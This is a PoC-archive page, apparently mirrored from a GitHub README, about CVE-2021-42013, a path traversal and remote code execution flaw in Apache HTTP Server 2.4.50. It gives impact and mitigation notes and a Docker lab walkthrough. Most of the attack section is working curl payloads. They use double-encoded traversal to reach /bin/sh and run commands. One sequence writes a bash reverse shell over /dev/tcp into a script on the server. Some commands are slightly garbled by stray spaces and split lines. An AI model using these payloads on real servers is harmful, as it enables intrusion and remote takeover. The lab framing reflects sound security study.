关联漏洞
标题:
Apache HTTP Server 安全漏洞
(CVE-2021-42013)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别
描述
CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (2.4.50)
介绍
# CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution Vulnerability
## Overview
This repository provides information and resources related to CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (versions 2.4.50). The vulnerability allows for path traversal and remote code execution (RCE) through a crafted URL path, enabling attackers to access and execute files outside the server's document root.
Details
- CVE Identifier: CVE-2021-42013
- Severity: Critical
- Affected Versions: Apache HTTP Server 2.4.50
- Fixed Version: Apache HTTP Server 2.4.51 or later
Description
CVE-2021-42013 is a vulnerability resulting from an incomplete fix for CVE-2021-41773. This flaw permits attackers to perform path traversal and potentially execute arbitrary code on the server. Exploitation of this vulnerability can lead to significant security breaches, including unauthorized access to sensitive data and full system compromise.
## Impact
Successful exploitation of CVE-2021-42013 can result in:
1. Unauthorized File Access: Attackers can access files outside the server’s document root, including sensitive system files, configuration files, and other protected resources. This could lead to the exposure of critical information, such as credentials, internal configurations, and other sensitive data.
2. Remote Code Execution: By accessing and executing arbitrary files, attackers can potentially run malicious scripts or binaries on the server. This could allow them to take control of the server, install malware, create backdoors, and manipulate server operations.
3. Service Disruption: Unauthorized access and execution of commands can disrupt normal server operations, leading to downtime, performance degradation, and denial of service (DoS) conditions. This impacts the availability and reliability of the services hosted on the server.
4. Privilege Escalation: In cases where the server runs with elevated privileges, an attacker exploiting this vulnerability could gain administrative access, allowing them to perform further malicious activities and escalate their control over the server environment.
5. Data Integrity Compromise: Attackers could modify or delete critical files, compromising the integrity of the data hosted on the server. This includes altering website content, defacing web pages, or tampering with application data.
## Mitigation
To protect your server from CVE-2021-42013, it is crucial to:
1. Update Apache HTTP Server: Upgrade to version 2.4.51 or later, where this vulnerability has been addressed.
2. Restrict Access: Ensure proper server configuration to restrict access to only necessary files and directories, reducing the risk of path traversal attacks.
## Simulation
Now, how about we do the simulation shall we? Before we start, you need to have docker engine. The installation is pretty simple, just make sure you have docker engine ready in your computer. I will help you provide the link [here](https://docs.docker.com/engine/install/). We use docker for the lab to make sure our simulation for the exploitation of the vulnerability is in line with the ethical hacking. Now enough yapping, let's start it!
### Usage
1. Clone this repository
Use git command to clone the repository
```
git clone https://github.com/rafifdna/CVE-2021-42013.git
```
Go to the directory of the file
```
cd CVE-2021-42013
```
2. Prepare Lab
First, build the images of the Dockerfile with the command below :
```
docker build -t apache-lab
```
Then, after the images is build, run the docker images with the command below :
```
docker run -dit -p 888:80 apache-lab
```
3. Verify Lab (Optional)
You can also check the docker to make sure the lab is running.
```
docker ps
```
```
docker logs <container-id>
```
Make sure the web is running, you can try curl the web to see the output.
```
curl http://172.17.0.2:888
```
4. Execution
Install the library requirement
```
pip install -r requirements.txt
```
You can use the script of exploit.py to perform vulnerability checking whether the website you targeted is vulnerable to the exploit or not before continue to the execution. This script include Path Traversal and Remote Code Execution (RCE).
```
python3 exploit.py -u http://172.17.0.2
```
Next, try using curl if we can
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; uname -a'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; ls'
```
## Exploitation
1. Remote Code Execution
Using Reverse Shell With Netcat
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /t
mp/lab.sh'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/t
cp/127.0.0.1/221 0>&1" >> /tmp/lab.sh'
```
```
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; cat /tmp/lab.sh'
```
Using Metasploit
### References
[CVE-2021-42013 Details](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
文件快照
[4.0K] /data/pocs/792f84f828cc6119caae28bfa60c05aa91301a59
├── [4.0K] apache
│ ├── [4.0K] path-traversal
│ │ ├── [ 68] dockerfile
│ │ └── [ 0] httpd.conf
│ └── [4.0K] rce
│ ├── [ 68] dockerfile
│ └── [ 20K] httpd.conf
├── [5.2K] exploit.py
├── [1.0K] LICENSE.md
├── [5.2K] README.md
└── [ 16] requirements.txt
3 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。